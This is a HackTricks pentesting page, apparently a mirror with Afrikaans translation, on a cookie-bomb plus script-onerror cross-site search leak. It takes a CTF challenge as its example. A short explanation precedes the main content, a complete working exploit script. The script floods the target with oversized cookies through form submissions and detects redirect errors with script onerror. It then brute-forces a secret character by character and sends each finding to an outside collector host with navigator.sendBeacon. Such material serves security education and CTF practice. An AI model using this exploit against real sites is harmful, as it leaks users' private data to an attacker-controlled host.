hacktricks/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md at 4630ea15cd279a0b6cdcd5f996069b4f40cc4c85

mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 22:18:27 +00:00

Translator a5a39f0714 Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

2024-07-19 16:28:56 +00:00

4 KiB

Raw Blame History

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

{% endhint %}

Die volgende script geneem van hier benut 'n funksionaliteit wat die gebruiker toelaat om enige hoeveelheid koekies in te voeg, en dan 'n lêer as 'n script te laai met die wete dat die ware antwoord groter sal wees as die valse een en dan. As dit suksesvol is, is die antwoord 'n omleiding met 'n resulterende URL wat langer is, te groot om deur die bediener hanteer te word, so dit keer 'n fout http statuskode terug. As die soektog misluk, sal daar niks gebeur nie omdat die URL kort is.

<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
<script>
const $ = document.querySelector.bind(document);
const sleep = (ms) => new Promise(r => setTimeout(r, ms));
let i = 0;
const stuff = async (len=3500) => {
let name = Math.random();
$("form").target = name;
let w = window.open('', name);
$("#f").value = "_".repeat(len);
$("#f").name = i++;
$("form").submit();
await sleep(100);
};
const isError = async (url) => {
return new Promise(r => {
let script = document.createElement('script');
script.src = url;
script.onload = () => r(false);
script.onerror = () => r(true);
document.head.appendChild(script);
});
}
const search = (query) => {
return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));
};
const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";
const url = "//en4u1nbmyeahu.x.pipedream.net/";
let known = "actf{";
window.onload = async () => {
navigator.sendBeacon(url + "?load");
await Promise.all([stuff(), stuff(), stuff(), stuff()]);
await stuff(1600);
navigator.sendBeacon(url + "?go");
while (true) {
for (let c of alphabet) {
let query = known + c;
if (await search(query)) {
navigator.sendBeacon(url, query);
known += c;
break;
}
}
}
};
</script>

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

{% endhint %}

4 KiB Raw Blame History

Cookie Bomb + Onerror XS Leak

4 KiB

Raw Blame History